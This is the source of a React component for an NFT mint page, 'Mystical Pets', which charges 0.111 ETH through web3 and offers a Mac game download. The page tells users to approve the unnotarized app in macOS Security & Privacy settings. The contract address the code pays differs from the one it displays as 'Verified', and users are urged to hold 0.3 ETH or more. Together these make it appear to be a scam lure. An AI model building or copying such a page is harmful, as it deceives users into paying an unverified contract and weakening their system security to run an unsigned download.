import React from "react";
import "./Pets.css";
import demon from "../../Assets/Pets/Demon.gif";
import angel from "../../Assets/Pets/Angel.gif";
import Dragon from "../../Assets/Pets/Dragon.gif";
import Druid from "../../Assets/Pets/Druid.gif";
import Hunter from "../../Assets/Pets/Hunter.gif";
import Machine from "../../Assets/Pets/Machine.gif";
import GoldEgg from "../../Assets/GoldEgg.gif";
import GreenEgg from "../../Assets/GreenEgg.gif";
import BlackEgg from "../../Assets/BlackEgg.gif";
import BlueEgg from "../../Assets/BlueEgg.gif";
import PurpleEgg from "../../Assets/PurpleEgg.gif";
import RedEgg from "../../Assets/RedEgg.gif";

import Web3 from "web3";
import { MysticalPets } from "../../abi/abi";

const web3 = new Web3(Web3.givenProvider);
const contractaddress = "0x850De0021a3D4c75B69C108de6bc9372355E7E8b";
const PetContract = new web3.eth.Contract(MysticalPets, contractaddress);

function Pets() {
  const downloadFile = () => {
      window.location.href = "https://mysticalpets.club/Game/MysticalPets.zip"
  }
  const claim = async (e) => {
    e.preventDefault();
    const web3 = await new Web3(window.ethereum);
    const value = web3.utils.toWei("0.111", "ether");
  
    await window.ethereum.enable();
    
    var Accounts = await web3.eth.getAccounts() 
        const account = Accounts[0]
        console.log(account)
      const gas = await PetContract.methods.claim().estimateGas({from: account, value});
      console.log(gas)
      
      await PetContract.methods.claim().send({ from: account, gas: gas,  value: value})
  }
  return (
    <div id="pets" className="pets">
      <h1>What is a Mystical Pet?</h1>
      <p className="desc-pets">
        Mystical Pets hatch from the Eggs stored on the Ethereum blockchain.<br />
        Once hatched they learn according to user's gameplay.<br /> Each pet is unique
        to its owner
      </p>
      <div className="card2-div">
        <div className="card2 eggs-cards">
          <div className="card2__side card2__side--front">
            <img src={RedEgg} alt="...." />
          </div>
          <div className="card2__side card2__side--back">
            <p>Rarity: High</p>
          </div>
        </div>
        <div className="card2">
          <div className="card2__side card2__side--front">
            <img src={BlueEgg} alt="...." />
          </div>
          <div className="card2__side card2__side--back">
          <p>Rarity: High</p>
          </div>
        </div>
        <div className="card2">
          <div className="card2__side card2__side--front">
            <img src={GreenEgg} alt="...." />
          </div>
          <div className="card2__side card2__side--back">
          <p>Rarity: High</p>
          </div>
        </div>
        <div className="card2">
          <div className="card2__side card2__side--front">
            <img src={BlackEgg} alt="...." />
          </div>
          <div className="card2__side card2__side--back">
          <p>Rarity: Medium</p>
          </div>
        </div>
        <div className="card2">
          <div className="card2__side card2__side--front">
            <img src={GoldEgg} alt="...." />
          </div>
          <div className="card2__side card2__side--back">
          <p>Rarity: Medium</p>
          </div>
        </div>
        <div className="card2">
          <div className="card2__side card2__side--front">
            <img src={PurpleEgg} alt="...." />
          </div>
          <div className="card2__side card2__side--back">
          <p>Rarity: Very Low</p>
          </div>
        </div>
      </div>
      <div className="center-pet">
      <button onClick={claim} value="Confirm" className="mint">MINT</button>
        <p>Currently 3000</p>
        <p>Make sure you have enough ETH before mint, 0.3 ETH+ to avoid gas issues </p>
      </div>
      <h1>Starter Pets</h1>
      <div className="card2-div">
        <div className="card2">
          <div className="card2__side card2__side--front">
            <img src={Machine} alt="...." />
          </div>
          <div className="card2__side card2__side--back">
            <p>Rarity: High</p>
            <p>Machine Species</p>
          </div>
        </div>
        <div className="card2">
          <div className="card2__side card2__side--front">
            <img src={Hunter} alt="...." />
          </div>
          <div className="card2__side card2__side--back">
            <p>Rarity: Medium</p>
            <p>Hunter Species</p>
          </div>
        </div>
        <div className="card2">
          <div className="card2__side card2__side--front">
            <img src={Druid} alt="...." />
          </div>
          <div className="card2__side card2__side--back">
            <p>Rarity: Medium</p>
            <p>Druid  Species</p>
          </div>
        </div>
        <div className="card2">
          <div className="card2__side card2__side--front">
            <img src={angel} alt="...." />
          </div>
          <div className="card2__side card2__side--back">
            <p>Rarity: Low</p>
            <p>Angel Species</p>
          </div>
        </div>
        <div className="card2">
          <div className="card2__side card2__side--front">
            <img src={demon} alt="...." />
          </div>
          <div className="card2__side card2__side--back">
            <p>Rarity: Low</p>
            <p>Demon Species</p>
          </div>
        </div>
        <div className="card2">
          <div className="card2__side card2__side--front">
            <img src={Dragon} alt="...." />
          </div>
          <div className="card2__side card2__side--back">
            <p>Rarity: Very Low</p>
            <p>Dragon Species</p>
          </div>
        </div>
      </div>
      <div className="center-pet">
        <button className="mint download" onClick={downloadFile}>DOWNLOAD</button>
        <p>Available on Mac</p>
        <p>Make sure to approve Mystical Pets in your System Prefs -> Security&Privacy -> General</p>
        <p>The game is going to be fully notarized with the release of the Single Player Game </p>
        <p>&nbsp;Verified Smart Contract Address</p>
        <h7 style={{  marginBottom: "20px" }} className="Address-text">
            <a href= "https://etherscan.io/address/0x7F11D1defDA7d0a5e67dfbE85E4FEb71E1679506">0x7F11D1defDA7d0a5e67dfbE85E4FEb71E1679506</a>
        </h7>
      </div>
    </div>
  );
}

export default Pets;
